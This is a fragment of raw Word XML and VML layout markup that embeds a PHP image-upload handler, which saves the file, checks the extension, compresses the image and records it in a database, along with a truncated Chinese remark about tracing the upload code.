            <v:rect id="_x0000_s3171" style="position:absolute;left:285;top:6768;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3170" style="position:absolute;left:385;top:6768;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3169" style="position:absolute;left:485;top:6768;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3168" style="position:absolute;left:585;top:6768;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3167" style="position:absolute;left:685;top:6768;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3166" style="position:absolute;left:785;top:6768;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3165" style="position:absolute;left:885;top:6768;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3164" style="position:absolute;left:985;top:6768;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3163" style="position:absolute;left:1085;top:6768;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3162" style="position:absolute;left:1185;top:6768;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3161" style="position:absolute;left:1285;top:6768;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3160" style="position:absolute;left:1385;top:6768;width:2892;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3159" style="position:absolute;left:5;top:7031;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3158" style="position:absolute;left:185;top:7094;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3157" style="position:absolute;left:285;top:7094;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3156" style="position:absolute;left:385;top:7094;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3155" style="position:absolute;left:485;top:7094;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3154" style="position:absolute;left:585;top:7094;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3153" style="position:absolute;left:685;top:7094;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3152" style="position:absolute;left:785;top:7094;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3151" style="position:absolute;left:885;top:7094;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3150" style="position:absolute;left:985;top:7094;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3149" style="position:absolute;left:1085;top:7094;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3148" style="position:absolute;left:1185;top:7094;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3147" style="position:absolute;left:1285;top:7094;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3146" style="position:absolute;left:5;top:7357;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3145" style="position:absolute;left:185;top:7420;width:6266;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3144" style="position:absolute;left:5;top:7683;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3143" style="position:absolute;left:185;top:7746;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3142" style="position:absolute;left:285;top:7746;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3141" style="position:absolute;left:385;top:7746;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3140" style="position:absolute;left:485;top:7746;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3139" style="position:absolute;left:585;top:7746;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3138" style="position:absolute;left:685;top:7746;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3137" style="position:absolute;left:785;top:7746;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3136" style="position:absolute;left:885;top:7746;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3135" style="position:absolute;left:985;top:7746;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3134" style="position:absolute;left:1085;top:7746;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3133" style="position:absolute;left:1185;top:7746;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3132" style="position:absolute;left:1285;top:7746;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3131" style="position:absolute;left:1385;top:7746;width:3133;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3130" style="position:absolute;left:4518;top:7746;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3129" style="position:absolute;left:4638;top:7746;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3128" style="position:absolute;left:4759;top:7746;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3127" style="position:absolute;left:5;top:8009;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3126" style="position:absolute;left:185;top:8072;width:3253;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3125" style="position:absolute;left:5;top:8335;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3124" style="position:absolute;left:185;top:8398;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3123" style="position:absolute;left:285;top:8398;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3122" style="position:absolute;left:385;top:8398;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3121" style="position:absolute;left:485;top:8398;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3120" style="position:absolute;left:585;top:8398;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3119" style="position:absolute;left:685;top:8398;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3118" style="position:absolute;left:785;top:8398;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3117" style="position:absolute;left:885;top:8398;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3116" style="position:absolute;left:985;top:8398;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3115" style="position:absolute;left:1085;top:8398;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3114" style="position:absolute;left:1185;top:8398;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3113" style="position:absolute;left:1285;top:8398;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3112" style="position:absolute;left:1385;top:8398;width:3494;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3111" style="position:absolute;left:4879;top:8398;width:91;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3110" style="position:absolute;left:4970;top:8398;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3109" style="position:absolute;left:5211;top:8398;width:92;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3108" style="position:absolute;left:5303;top:8398;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3107" style="position:absolute;left:5544;top:8398;width:91;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3106" style="position:absolute;left:5635;top:8398;width:602;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3105" style="position:absolute;left:6237;top:8398;width:91;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3104" style="position:absolute;left:6328;top:8398;width:242;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3103" style="position:absolute;left:6570;top:8398;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3102" style="position:absolute;left:5;top:8661;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3101" style="position:absolute;left:185;top:8724;width:964;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3100" style="position:absolute;left:5;top:8987;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3099" style="position:absolute;left:185;top:9050;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3098" style="position:absolute;left:285;top:9050;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3097" style="position:absolute;left:385;top:9050;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3096" style="position:absolute;left:485;top:9050;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3095" style="position:absolute;left:585;top:9050;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3094" style="position:absolute;left:685;top:9050;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3093" style="position:absolute;left:785;top:9050;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3092" style="position:absolute;left:885;top:9050;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3091" style="position:absolute;left:985;top:9050;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3090" style="position:absolute;left:5;top:9313;width:6745;height:506" fillcolor="#f8f8f8" stroked="f"/>
            <v:shape id="_x0000_s3089" type="#_x0000_t75" style="position:absolute;left:185;top:9376;width:520;height:200">
              <v:imagedata r:id="rId60" o:title=""/>
            </v:shape>
            <v:shape id="_x0000_s3088" type="#_x0000_t202" style="position:absolute;left:3;top:3;width:6750;height:9819" filled="f" strokecolor="#ccc" strokeweight=".24pt">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent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80020F">
                    <w:pPr>
                      <w:spacing w:before="1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move_uploaded_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$file['tmpname'],</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="126" w:line="388" w:lineRule="auto"/>
                      <w:ind w:left="1380" w:right="50" w:hanging="120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$this-&gt;file-&gt;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savePath .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'pathname']);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if(in_array(strtolower($file['extension']),</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="2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$this-&gt;config-&gt;file-&gt;imageExtensions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) !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== false)</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="126"/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292EF3">
                    <w:pPr>
                      <w:rPr>
                        <w:rFonts w:ascii="Verdana"/>
                        <w:sz w:val="20"/>
                      </w:rPr>
                    </w:pPr>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
                    <w:pPr>
                      <w:spacing w:before="3"/>
                      <w:rPr>
                        <w:rFonts w:ascii="Verdana"/>
                        <w:sz w:val="17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$this-&gt;file-&gt;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compressImage(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$this-&gt;fil</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:color w:val="333333"/>
                        <w:sz w:val="20"/>
                      </w:rPr>
                      <w:t>e-&gt;savePath .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'pathname']);</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="124"/>
                      <w:ind w:left="17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$imageSize =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$this-&gt;file-&gt;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getImageSize(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$this-&gt;file-&gt;savePath .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'pathname']);</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:tabs>
                        <w:tab w:val="left" w:pos="3668"/>
                      </w:tabs>
                      <w:spacing w:before="126"/>
                      <w:ind w:left="17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'width']</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:color w:val="333333"/>
                        <w:sz w:val="20"/>
                      </w:rPr>
                      <w:tab/>
                      <w:t>=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$imageSize['width'];</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="126"/>
                      <w:ind w:left="17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'height'] = $imageSize['height'];</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="126"/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$url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=  $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this-&gt;file-&gt;webPath</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:color w:val="333333"/>
                        <w:spacing w:val="-5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'pathname'];</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:tabs>
                        <w:tab w:val="left" w:pos="3608"/>
                      </w:tabs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</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:color w:val="333333"/>
                        <w:sz w:val="20"/>
                      </w:rPr>
                      <w:t>addedBy']</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:color w:val="333333"/>
                        <w:sz w:val="20"/>
                      </w:rPr>
                      <w:tab/>
                      <w:t>=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$this-&gt;app-&gt;user-&gt;account;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'addedDate'] = helper::now();</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:tabs>
                        <w:tab w:val="left" w:pos="3586"/>
                      </w:tabs>
                      <w:spacing w:before="126" w:line="388" w:lineRule="auto"/>
                      <w:ind w:left="1380" w:right="247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'editor']</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:color w:val="333333"/>
                        <w:sz w:val="20"/>
                      </w:rPr>
                      <w:tab/>
                      <w:t>=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1;</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:color w:val="333333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unset($file['tmpname']);</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
                    <w:pPr>
                      <w:rPr>
                        <w:rFonts w:ascii="Verdana"/>
                        <w:sz w:val="27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$this-&gt;dao-&gt;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insert(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TABLE_FILE)-&gt;data($file)-&gt;exec();</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="126"/>
                      <w:ind w:left="13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SESSION[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'album'][$uid][] =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$this-&gt;dao-&gt;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lastInsertID(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/>
                      <w:ind w:left="1380" w:right="-6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die(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json_encode(array('e</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:color w:val="333333"/>
                        <w:sz w:val="20"/>
                      </w:rPr>
                      <w:t>rror' =&gt; 0, 'url' =&gt;</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="124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url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)));</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="126"/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right="5464"/>
                      <w:jc w:val="center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pStyle w:val="a3"/>
        <w:spacing w:before="53" w:line="345" w:lineRule="auto"/>
        <w:ind w:left="417" w:right="5383"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这个上传文件的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跟到</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:spacing w:line="345" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体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7"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:sz w:val="7"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="231"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
        </w:rPr>
        <w:pict>
          <v:group id="_x0000_s1885" style="width:337.75pt;height:246.7pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="6755,4934">
            <v:rect id="_x0000_s3086" style="position:absolute;left:5;top:5;width:6745;height:506" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3085" style="position:absolute;left:185;top:248;width:723;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3084" style="position:absolute;left:908;top:248;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3083" style="position:absolute;left:1028;top:248;width:964;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3082" style="position:absolute;left:1992;top:248;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3081" style="position:absolute;left:2113;top:248;width:2651;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3080" style="position:absolute;left:4764;top:248;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3079" style="position:absolute;left:4884;top:248;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3078" style="position:absolute;left:5005;top:248;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3077" style="position:absolute;left:5125;top:248;width:964;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3076" style="position:absolute;left:5;top:511;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:shape id="_x0000_s3075" type="#_x0000_t75" style="position:absolute;left:185;top:574;width:520;height:200">
              <v:imagedata r:id="rId68" o:title=""/>
            </v:shape>
            <v:rect id="_x0000_s3074" style="position:absolute;left:5;top:837;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3073" style="position:absolute;left:185;top:900;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3072" style="position:absolute;left:285;top:900;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s2047" style="position:absolute;left:385;top:900;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s2046" style="position:absolute;left:485;top:900;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s2045" style="position:absolute;left:585;top:900;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s2044" style="position:absolute;left:685;top:900;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s2043" style="position:absolute;left:785;top:900;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s2042" style="position:absolute;left:885;top:900;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s2041" style="position:absolute;left:985;top:900;width:723;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s2040" style="position:absolute;left:1708;top:900;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s2039" style="position:absolute;left:1828;top:900;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s2038" style="position:absolute;left:1949;top:900;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s2037" style="position:absolute;left:2069;top:900;width:964;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s2036" style="position:absolute;left:5;top:1163;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s2035" style="position:absolute;left:185;top:1226;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s2034" style="position:absolute;left:285;top:1226;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s2033" style="position:absolute;left:385;top:1226;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s2032" style="position:absolute;left:485;top:1226;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s2031" style="position:absolute;left:585;top:1226;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s2030" style="position:absolute;left:685;top:1226;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s2029" style="position:absolute;left:785;top:1226;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s2028" style="position:absolute;left:885;top:1226;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s2027" style="position:absolute;left:985;top:1226;width:3976;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s2026" style="position:absolute;left:4961;top:1226;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s2025" style="position:absolute;left:5082;top:1226;width:723;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s2024" style="position:absolute;left:5805;top:1226;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s2023" style="position:absolute;left:5;top:1489;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s2022" style="position:absolute;left:185;top:1552;width:843;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s2021" style="position:absolute;left:5;top:1815;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s2020" style="position:absolute;left:185;top:1878;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s2019" style="position:absolute;left:285;top:1878;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s2018" style="position:absolute;left:385;top:1878;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s2017" style="position:absolute;left:485;top:1878;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s2016" style="position:absolute;left:585;top:1878;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s2015" style="position:absolute;left:685;top:1878;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s2014" style="position:absolute;left:785;top:1878;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s2013" style="position:absolute;left:885;top:1878;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s2012" style="position:absolute;left:985;top:1878;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s2011" style="position:absolute;left:1226;top:1878;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s2010" style="position:absolute;left:1346;top:1878;width:362;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s2009" style="position:absolute;left:1708;top:1878;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s2008" style="position:absolute;left:1828;top:1878;width:362;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s2007" style="position:absolute;left:2190;top:1878;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s2006" style="position:absolute;left:2310;top:1878;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s2005" style="position:absolute;left:2551;top:1878;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s2004" style="position:absolute;left:2672;top:1878;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s2003" style="position:absolute;left:2913;top:1878;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s2002" style="position:absolute;left:3033;top:1878;width:723;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s2001" style="position:absolute;left:3756;top:1878;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s2000" style="position:absolute;left:3877;top:1878;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1999" style="position:absolute;left:5;top:2141;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1998" style="position:absolute;left:185;top:2204;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1997" style="position:absolute;left:285;top:2204;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1996" style="position:absolute;left:385;top:2204;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1995" style="position:absolute;left:485;top:2204;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1994" style="position:absolute;left:585;top:2204;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1993" style="position:absolute;left:685;top:2204;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1992" style="position:absolute;left:785;top:2204;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1991" style="position:absolute;left:885;top:2204;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1990" style="position:absolute;left:985;top:2204;width:5181;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1989" style="position:absolute;left:5;top:2467;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1988" style="position:absolute;left:185;top:2530;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1987" style="position:absolute;left:285;top:2530;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1986" style="position:absolute;left:385;top:2530;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1985" style="position:absolute;left:485;top:2530;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1984" style="position:absolute;left:585;top:2530;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1983" style="position:absolute;left:685;top:2530;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1982" style="position:absolute;left:785;top:2530;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1981" style="position:absolute;left:885;top:2530;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1980" style="position:absolute;left:985;top:2530;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1979" style="position:absolute;left:5;top:2793;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1978" style="position:absolute;left:185;top:2856;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1977" style="position:absolute;left:285;top:2856;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1976" style="position:absolute;left:385;top:2856;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1975" style="position:absolute;left:485;top:2856;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1974" style="position:absolute;left:585;top:2856;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1973" style="position:absolute;left:685;top:2856;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1972" style="position:absolute;left:785;top:2856;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
